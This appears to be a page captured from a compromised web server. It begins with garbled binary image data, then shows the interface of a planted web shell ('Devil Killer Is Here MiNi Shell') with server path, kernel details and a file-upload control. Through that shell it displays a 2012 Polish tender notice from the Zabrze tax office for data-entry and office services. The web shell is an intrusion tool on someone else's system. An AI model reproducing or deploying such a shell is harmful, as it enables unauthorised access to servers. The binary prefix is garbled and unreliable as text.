JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120301/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120301/62788-N-2012.html

<p class="kh_header"><b>Zabrze: Wprowadzanie danych do systemów komputerowych oraz dodatkowe usługi biurowe. OL-1/251-2/PN-2/12</b><br>
<b>Numer ogłoszenia: 62788 - 2012; data zamieszczenia: 01.03.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Skarbowy w Zabrzu , ul. Bytomska 2, 41-800 Zabrze, woj. śląskie, tel. 032 2777699, faks 032 2777666.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.isnet.katowice.pl/us/zabrze.htm</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wprowadzanie danych do systemów komputerowych oraz dodatkowe usługi biurowe. OL-1/251-2/PN-2/12.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiot zamówienia został podzielony na 14 części i obejmuje niżej wymienione zadania:

Zadanie nr 1  obejmuje 2 części 

Zadanie obejmuje  wprowadzanie danych do systemu: 
 - informacji o zobowiązanym (INFOTAX/ANALIZATOR) do tytułów wykonawczych o symbolu W2 w aplikacji EGAPOLTAX - 40 sztuk w ciągu 1 godziny,
- informacji o dacie wszczęcia postępowania i zastosowaniu środka egzekucyjnego w aplikacji EGAPOLTAX (15 zajęć na 1 godzinę),
-  korespondencji wychodzącej w aplikacji Biblioteka Akt oraz wykonanie czynności nadawczych tj. zaklejanie korespondencji wychodzącej, wprowadzanie potwierdzeń odbioru  
   do Biblioteki Akt oraz podział otrzymanych potwierdzeń odbioru z Urzędu Pocztowego
- odnotowywanie wpływów zrealizowanych kwot w aplikacji EGAPOLTAX (15 szt. na 1 godzinę), 
- kompletowanie TW na rejonach 40 sztuk na 1 godzinę
- archiwizacja akt egzekucyjnych 30 sztuk na godzinę
Jedna część równa się jeden wykonawca, w tym zadaniu zostanie wybranych dwóch wykonawców.
Zamawiający dysponuje funduszami, które pozwalają na wynagrodzenie Wykonawcy w wysokości nie większej niż 8,25 złotych brutto za jedną godzinę.
Zadanie zostało przewidziane na 1150 godzin.
Termin realizacji zadania od 02 kwietnia 2012 r. do 14 grudnia 2012 r.
Zamawiający zastrzega sobie prawo zakończenia umowy w momencie wyczerpania dokumentów do wprowadzania.

Zadanie nr 2 obejmuje 6 części 

Zadanie obejmuje wprowadzanie danych do bazy POLTAX: - 
	Maksymalna przewidywana cena jednostkowa za 1 sztukę wprowadzanej deklaracji, którą Zamawiający przewiduje na sfinansowanie/Łączna ilość deklaracji do wprowadzenia/Minimalna ilość deklaracji do wprowadzenia w ciągu 1 godziny:
PIT-36L *	/1 zł/70 sztuk/13 sztuk
PIT-36*/1 zł/400 sztuk/13 sztuk
PIT-38,39*/0,30 zł/120 sztuk/40 sztuk
PIT- 37*/0,60 zł/4000 sztuk/20 sztuk
* integralną częścią deklaracji PIT-36, PIT-36L oraz PIT-37 są załączniki, dlatego cena jednostkowa wprowadzenia deklaracji PIT-36, PIT-36L oraz PIT-37 obejmuje również wprowadzenie załączników
Zamawiający będzie wskazywał deklaracje priorytetowe, do wprowadzenia w pierwszej kolejności. 
Czynności do wykonania w zadaniu:
- wprowadzanie danych zawartych w zeznaniach rocznych,
-wyłączenie z paczek po otrzymaniu informacji od kierownika OB.-13 deklaracji wymagających czynności sprawdzających i przypisanie ich do nowych paczek, 
- wyłączenie z paczek zeznań z statusem błędne i przypisanie ich do nowych paczek 
- obsługa dokumentów w systemach informatycznych: POLTAX.
Każda z części obejmuje ten sam zakres usług (zadań), jedna część równa się jeden wykonawca, w tym zadaniu zostanie wybranych sześciu wykonawców.
Termin realizacji zadania od 02 kwietnia 2012 r. do 31 maja 2012 r.
Zamawiający zastrzega sobie prawo zakończenia umowy w momencie wyczerpania dokumentów do wprowadzania
Zadanie nr 3 obejmuje 1 część 

Zadanie obejmuje:
- rejestrację poczty wychodzącej w programie komputerowym Biblioteka Akt
-archiwizowanie paczek,
-stemplowanie zaksięgowanych i uzgodnionych deklaracji VAT-7 i PIT-37 do zapłaty
-wykonywanie innych czynności niezbędnych w powyższym zakresie zleconych przez Zamawiającego
Minimalna ilość zarejestrowanej poczty w systemie komputerowym Biblioteka Akt wynosi 25 szt. na 1 godzinę.
Jedna część równa się jeden wykonawca, w tym zadaniu zostanie wybrany jeden wykonawca.
Zamawiający dysponuje funduszami, które pozwalają na wynagrodzenie Wykonawcy 
w wysokości nie większej niż  8,25 zł brutto za jedną godzinę. Zadanie zostało przewidziane na 1170 godzin.

Termin realizacji zadania od 02 kwietnia 2012 r. do 14 grudnia 2012 r.
Zamawiający zastrzega sobie prawo zakończenia umowy w momencie wyczerpania dokumentów do wprowadzenia.

Zadanie nr 4 obejmuje 1 część

Zadanie obejmujące wprowadzanie danych do aplikacji Egapoltax
Wprowadzanie do aplikacji Egapoltax:	Wprowadzanie tytułów wykonawczych oraz wprowadzanie informacji do systemów INFOTAX ,ANALIZATOR, Egapoltax, Biblioteka Akt, Ilość godzin w zadaniu:	1.018


Czynności do wykonania w zadaniu:-
- rejestracja wpływających tytułów wykonawczych obcych wierzycieli w rejestrze
- wprowadzanie danych zawartych w tytułach wykonawczych do systemu Egapoltax,
- przekazywanie wprowadzonych tytułów wykonawczych do komórki EA za potwierdzeniem odbioru, 
-sporządzanie notatek służbowych w przypadku braku możliwości wprowadzenia tytułu wykonawczego do systemu 
- przekazywanie notatek służbowych do odpowiednich komórek organizacyjnych, 
- wprowadzanie  informacji o zobowiązanym (INFOTAX/ANALIZATOR) do tytułów wykonawczych o symbolu W2 w aplikacji EGAPOLTAX, 
- wprowadzanie informacji o dacie wszczęcia postępowania i zastosowaniu środka egzekucyjnego w aplikacji  Egapoltax
- wprowadzanie korespondencji wychodzącej do aplikacji Biblioteka Akt oraz wykonanie czynności nadawczych, odnotowywanie wpływów zrealizowanych kwot w aplikacji EGAPOLTAX. 
Każda z części obejmuje ten sam zakres usług (zadań), jedna część równa się jeden wykonawca, w tym zadaniu zostanie wybrany jeden wykonawca.
Zamawiający dysponuje funduszami, które pozwalają na wynagrodzenie Wykonawcy w wysokości nie większej niż brutto 8,25 zł za jedną godzinę.

Termin realizacji zadania od 15 maja 2012 r. do 14 grudnia 2012r.
Zamawiający zastrzega sobie prawo zakończenia umowy w momencie wyczerpania dokumentów do wprowadzania.

Zadanie nr 5 obejmuje 4 części

Zadanie obejmujące wprowadzanie danych do aplikacji POLTAX
	Maksymalna przewidywana cena jednostkowa za 1 sztukę wprowadzanej deklaracji, którą Zamawiający przewiduje na sfinansowanie/ Łączna ilość deklaracji do wprowadzenia w każdej z części/ Minimalna ilość deklaracji do wprowadzenia w ciągu 1 godziny:
PIT-11, 11A, 8C,PIT-R /0,20/16.000/40 sztuk

Czynności do wykonania w zadaniu:
- utworzenie paczki
- wstępna rejestracja i wprowadzanie danych szczegółowych do systemu POLTAX
- przekazywanie paczek  do odpowiednich komórek organizacyjnych,
Każda z części obejmuje ten sam zakres usług (zadań), jedna część równa się jeden wykonawca, w tym zadaniu zostanie wybranych czterech wykonawców.

Termin realizacji zamówienia od 02 kwietnia 2012 r. do 15 lipca 2012 r.
Zamawiający zastrzega sobie prawo zakończenia umowy w momencie wyczerpania dokumentów do wprowadzania.

2.W przypadku złożenia ofert przez firmę, przedmiot zamówienia jest objęty stawką 23% podatku VAT wynikającą z kwalifikacji grupowania statystycznego PKWiU.
3.W przypadku złożenia oferty przez osobę fizyczną Zamawiający potrąci i odprowadzi do ZUS obowiązkowe składki na ubezpieczenia emerytalne, rentowe, wypadkowe i chorobowe zgodnie
z ustawą o systemie ubezpieczeń społecznych z dnia 13 października 1998r. ( tekst jednolity
Dz. U. z 2009r. nr 205 poz.1585 z późn. zm.) oraz zaliczkę na podatek dochodowy zgodnie
z obowiązującymi przepisami.
4.W trakcie trwania umowy, Wykonawca będący osobą fizyczną prowadzącą działalność gospodarczą może zmienić osobę przewidzianą do realizacji przedmiotowych usług, z tym,
że zmiana ta może być dokonana tylko jeden raz. Dodatkowo zamawiający zastrzega,
iż w przypadku zmiany osoby przewidzianej do realizacji zamówienia, osoba ta musi spełniać warunki określone w niniejszej SIWZ.
5.Nazwy i kody dotyczące przedmiotu zamówienia określone w Wspólnym Słowniku Zamówień Publicznych (CPV)
72312000-5 - usługi wprowadzania danych
79500000-9 - dodatkowe usługi biurowe
6.Zamawiający dopuszcza składanie ofert częściowych -  zamówienie podzielono na 14 części.
7.Wykonawca wymaga  złożenia dla każdego zadania odrębnej oferty - jeden wykonawca może złożyć maksymalnie dwie oferty tj. uczestniczyć w dwóch zadaniach.
8.Zamawiający nie dopuszcza możliwości składania ofert wariantowych.
9.Zamawiający nie przewiduje zawarcia umowy ramowej.
10.Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, stanowiących nie więcej niż 50% wartości zamówienia dla poszczególnych części.
11.Zamawiający nie przewiduje dokonania ostatecznego wyboru najkorzystniejszej oferty
z zastosowaniem aukcji elektronicznej.
12.Zamawiający nie przewiduje udzielenia zaliczki na poczet wykonania zamówienia.
13.Zamawiający nie ogranicza możliwości ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50% pracowników stanowią osoby niepełnosprawne..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, stanowiących nie więcej niż 50% wartości zamówienia dla poszczególnych części.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 79.50.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 02.04.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca złoży oświadczenie o znajomości n/w programów komputerowych- Załącznik nr 6 do SIWZ
- zadanie nr 1 - doświadczenie w zakresie obsługi programów: EGAPOLTAX, Biblioteka Akt
- zadanie nr 2 - doświadczenie w zakresie obsługi programu POLTAX 
- zadanie nr 3 - doświadczenie w zakresie obsługi programu Biblioteka Akt 
- zadanie nr 4 - doświadczenie w zakresie obsługi programu EGAPOLTAX
- zadanie nr 5 - doświadczenie w zakresie obsługi programu POLTAX</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli w dniu składania oferty osoby będą miały ukończone 18 lat i ukończoną szkołę średnią- należy wypełnić oświadczenie  Załącznik nr 7 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Pełnomocnictwo do reprezentowania wykonawcy, o ile ofertę składa pełnomocnik.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.isnet.katowice.pl/us/zabrze.htm<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Skarbowy w Zabrzu
ul. Bytomska 2
41-800 Zabrze 
pokój 510.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.03.2012 godzina 09:00, miejsce: Urząd Skarbowy w Zabrzu
ul. Bytomska 2
41-800 Zabrze
pokój 510.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje  wprowadzanie danych do systemu: 
 - informacji o zobowiązanym (INFOTAX/ANALIZATOR) do tytułów wykonawczych o symbolu W2 w aplikacji EGAPOLTAX - 40 sztuk w ciągu 1 godziny,
- informacji o dacie wszczęcia postępowania i zastosowaniu środka egzekucyjnego w aplikacji  
  EGAPOLTAX (15 zajęć na 1 godzinę),
-  korespondencji wychodzącej w aplikacji Biblioteka Akt oraz wykonanie czynności  
   nadawczych tj. zaklejanie korespondencji wychodzącej, wprowadzanie potwierdzeń odbioru  
   do Biblioteki Akt oraz podział otrzymanych potwierdzeń odbioru z Urzędu Pocztowego
- odnotowywanie wpływów zrealizowanych kwot w aplikacji EGAPOLTAX (15 szt. na 1 godzinę), 
- kompletowanie TW na rejonach 40 sztuk na 1 godzinę
- archiwizacja akt egzekucyjnych 30 sztuk na godzinę
Jedna część równa się jeden wykonawca, w tym zadaniu zostanie wybranych dwóch wykonawców.
Zamawiający dysponuje funduszami, które pozwalają na wynagrodzenie Wykonawcy w wysokości nie większej niż 8,25 złotych brutto za jedną godzinę.
Zadanie zostało przewidziane na 1150 godzin.
Termin realizacji zadania od 02 kwietnia 2012 r. do 14 grudnia 2012 r.
Zamawiający zastrzega sobie prawo zakończenia umowy w momencie wyczerpania dokumentów do wprowadzania.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 79.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 02.04.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 1.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje  wprowadzanie danych do systemu: 
 - informacji o zobowiązanym (INFOTAX/ANALIZATOR) do tytułów wykonawczych o symbolu W2 w aplikacji EGAPOLTAX - 40 sztuk w ciągu 1 godziny,
- informacji o dacie wszczęcia postępowania i zastosowaniu środka egzekucyjnego w aplikacji  
  EGAPOLTAX (15 zajęć na 1 godzinę),
-  korespondencji wychodzącej w aplikacji Biblioteka Akt oraz wykonanie czynności  
   nadawczych tj. zaklejanie korespondencji wychodzącej, wprowadzanie potwierdzeń odbioru  
   do Biblioteki Akt oraz podział otrzymanych potwierdzeń odbioru z Urzędu Pocztowego
- odnotowywanie wpływów zrealizowanych kwot w aplikacji EGAPOLTAX (15 szt. na 1 godzinę), 
- kompletowanie TW na rejonach 40 sztuk na 1 godzinę
- archiwizacja akt egzekucyjnych 30 sztuk na godzinę
Jedna część równa się jeden wykonawca, w tym zadaniu zostanie wybranych dwóch wykonawców.
Zamawiający dysponuje funduszami, które pozwalają na wynagrodzenie Wykonawcy w wysokości nie większej niż 8,25 złotych brutto za jedną godzinę.
Zadanie zostało przewidziane na 1150 godzin.
Termin realizacji zadania od 02 kwietnia 2012 r. do 14 grudnia 2012 r.
Zamawiający zastrzega sobie prawo zakończenia umowy w momencie wyczerpania dokumentów do wprowadzania.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 72.31.20.00-5, 79.50.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 02.04.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie nr 2.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie obejmuje wprowadzanie danych do bazy POLTAX: - 
	Maksymalna przewidywana cena jednostkowa za 1 sztukę wprowadzanej deklaracji, którą Zamawiający przewiduje na sfinansowanie/ Łączna ilość deklaracji do wprowadzenia/Minimalna ilość deklaracji do wprowadzenia w ciągu 1 godziny
PIT-36L *	/1 zł/70 sztuk/13 sztuk
PIT-36*/1 zł/400 sztuk/13 sztuk
PIT-38,39*/0,30 zł/	120 sztuk/40 sztuk
PIT- 37*/	0,60 zł/4000 sztuk/20 sztuk
* integralną częścią deklaracji PIT-36, PIT-36L oraz PIT-37 są załączniki, dlatego cena jednostkowa wprowadzenia deklaracji PIT-36, PIT-36L oraz PIT-37 obejmuje również wprowadzenie załączników
Zamawiający będzie wskazywał deklaracje priorytetowe, do wprowadzenia w pierwszej kolejności. 
Czynności do wykonania w zadaniu:
- wprowadzanie danych zawartych w zeznaniach rocznych,
-wyłączenie z paczek po otrzymaniu informacji od kierownika OB.-13 deklaracji wymagających czynności sprawdzających i przypisanie ich do nowych paczek, 
- wyłączenie z paczek zeznań z statusem błędne i przypisanie ich do nowych paczek 
- obsługa dokumentów w systemach informatycznych: POLTAX.
Każda z części obejmuje ten sam zakres usług (zadań), jedna część równa się jeden wykonawca, w tym zadaniu zostanie wybranych sześciu wykonawców.
Termin realizacji zadania od 02 kwietnia 2012 r. do 31 maja 2012 r.
Zamawiający zastrzega sobie prawo zakończenia umowy w momencie wyczerpania dokumentów do wprowadzania.</p></li>
